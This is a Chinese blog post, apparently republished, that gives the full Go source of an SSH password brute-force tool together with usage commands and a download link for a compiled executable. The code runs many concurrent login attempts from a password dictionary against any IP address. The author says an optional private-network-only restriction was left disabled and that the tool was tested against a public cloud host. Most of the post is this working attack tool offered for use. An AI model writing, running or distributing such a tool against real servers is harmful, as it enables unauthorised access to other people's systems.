Golang 版的ssh爆破小工具
时间:2020-05-30
本文章向大家介绍Golang 版的ssh爆破小工具,主要包括Golang 版的ssh爆破小工具使用实例、应用技巧、基本知识点总结和需要注意事项,具有一定的参考价值,需要的朋友可以参考一下。
源码如下:
package main import ( "bufio" "flag" "fmt" "golang.org/x/crypto/ssh" "io" "os" "regexp" "runtime" "sync" "time" ) var ( file string host string port int user string ) var exit = make(chan bool) var starttime = time.Now() var wg = sync.WaitGroup{} var cpunum = runtime.NumCPU() func init() { //获取命令行配置信息 flag.StringVar(&file,"f","pass.txt","密码文件") flag.StringVar(&host,"h","127.0.0.1","ip地址") flag.IntVar(&port,"p",22,"端口地址") flag.StringVar(&user,"u","root","用户名") } func main(){ defer testtime(starttime) flag.Parse() //match := CheckIp(host) //if !match { // fmt.Println("ip错误,只能用于内网ip地址。\n正则验证规则:`^(192\\.168(\\.(\\d|[1-9]\\d|1\\d{2}|2[0-4]\\d|25[0-5])){2}|172\\.(1[6-9]|2\\d|3[0,1])(\\.(\\d|[1-9]\\d|1\\d{2}|2[0-4]\\d|25[0-5])){2}|10(\\.(\\d|[1-9]\\d|1\\d{2}|2[0-4]\\d|25[0-5])){3})$`") // return //} if host == "127.0.0.1" { fmt.Printf("[-]Usage %s -h=192.168.1.1\n",os.Args[0]) fmt.Println("密码字典默认为同目录下的:pass.txt。可以通过:-f=xx.txt指定") return } passchan := make(chan string) //开启一个pass读取协程将读取到的密码赋予给一个passchan通道。 go func(){ file,err := os.Open(file) if err != nil { fmt.Println(err) os.Exit(1) } defer file.Close() bf := bufio.NewReader(file) for { str,err := bf.ReadString('\n') if err != nil { if err == io.EOF { fmt.Println("文件读取完毕") }else { fmt.Println("读取文件错误",err) } close(passchan) return } passchan<- str[:len(str)-2] } }() //开启一个ssh链接协程,监听passchan通道,并创建链接 ip := fmt.Sprintf("%s:%d", host, port) worknum := (cpunum-1)*20 for i:=0; i<worknum; i++ { wg.Add(1) go SshConnect(ip,passchan) } wg.Wait() //time.Sleep(time.Second*15) } //ssh链接函数 func SshConnect(ip string, passchan chan string) { for { select { case pass,ok := <-passchan : if !ok { wg.Done() return } client := &ssh.ClientConfig{ User: user, Timeout: time.Second, HostKeyCallback: ssh.InsecureIgnoreHostKey(), Auth: []ssh.AuthMethod{ssh.Password(pass)}, } _,err := ssh.Dial("tcp",ip,client) if err == nil { fmt.Printf("%s 爆破成功。账号:%s,密码:%v",ip,client.User,pass) testtime(starttime) os.Exit(1) } case <-time.After(time.Second * 60) : fmt.Println("链接ssh出错,在select处退出") os.Exit(1) } } } func CheckIp(ip string) bool { // 0-255 //(\d|[1-9]\d|1\d{2}|2[0-4]\d|25[0-5]) //192.168.0.0 - 192.168.255.255 //192\.168(\.(\d|[1-9]\d|1\d{2}|2[0-4]\d|25[0-5])){2} //172.16.0.0 - 172.31.255.255 //172\.(1[6-9]|2\d|3[0,1])(\.(\d|[1-9]\d|1\d{2}|2[0-4]\d|25[0-5])){2} //10.0.0.0 - 10.255.255.255 //10(\.(\d|[1-9]\d|1\d{2}|2[0-4]\d|25[0-5])){3} match,err := regexp.MatchString(`^(192\.168(\.(\d|[1-9]\d|1\d{2}|2[0-4]\d|25[0-5])){2}|172\.(1[6-9]|2\d|3[0,1])(\.(\d|[1-9]\d|1\d{2}|2[0-4]\d|25[0-5])){2}|10(\.(\d|[1-9]\d|1\d{2}|2[0-4]\d|25[0-5])){3})$`,ip) if err != nil{ fmt.Println(err) return false } return match } func testtime(start time.Time) { fmt.Println("运行时间:",time.Since(start)) }
并发数为:(CPU-1)*20。我本地4核,也就是60条并发协程。
ssh链接超时为1秒,经过测试1000条记录,20s跑完。(香港阿里云机器)
使用:
xxx.exe -h=192.168.1.1 -p=22 -f=mima.txt -u=root
其中:-p可以不指定,默认为22端口。-u可以不指定,默认为root。-f可以不指定,默认为同目录下的pass.txt文件。
其中的 Checkip 函数原目的为限制ip只能为内网ip地址,但只有公网测试地址,就没使用了。
总结:
通过 sync 包下的 WaitGroup 来控制所有协程的结束,但是这里却有一点问题,就是假如正确密码在文本的最后几行(差不多20行内),却得不到正确的返回。
猜测可能是最后的协程并没有执行完毕,协程就被迫结束了。我在最后添加了延迟10秒,发现效果也不好,不知道怎么解决这个问题。
同时文本最后一行的密码读取不到,因为读取最后一行时,err == io.EOF,导致Close(chan)关闭了通道,因为上面的问题,所以这个无关紧要了。
编译好的exe文件地址:
链接: https://pan.baidu.com/s/1q4V6swxn-BXpKQtq39Udcg 提取码: 89tf
原文地址:https://www.cnblogs.com/xiaozhiru/p/12993966.html
- JavaScript 教程
- JavaScript 编辑工具
- JavaScript 与HTML
- JavaScript 与Java
- JavaScript 数据结构
- JavaScript 基本数据类型
- JavaScript 特殊数据类型
- JavaScript 运算符
- JavaScript typeof 运算符
- JavaScript 表达式
- JavaScript 类型转换
- JavaScript 基本语法
- JavaScript 注释
- Javascript 基本处理流程
- Javascript 选择结构
- Javascript if 语句
- Javascript if 语句的嵌套
- Javascript switch 语句
- Javascript 循环结构
- Javascript 循环结构实例
- Javascript 跳转语句
- Javascript 控制语句总结
- Javascript 函数介绍
- Javascript 函数的定义
- Javascript 函数调用
- Javascript 几种特殊的函数
- JavaScript 内置函数简介
- Javascript eval() 函数
- Javascript isFinite() 函数
- Javascript isNaN() 函数
- parseInt() 与 parseFloat()
- escape() 与 unescape()
- Javascript 字符串介绍
- Javascript length属性
- javascript 字符串函数
- Javascript 日期对象简介
- Javascript 日期对象用途
- Date 对象属性和方法
- Javascript 数组是什么
- Javascript 创建数组
- Javascript 数组赋值与取值
- Javascript 数组属性和方法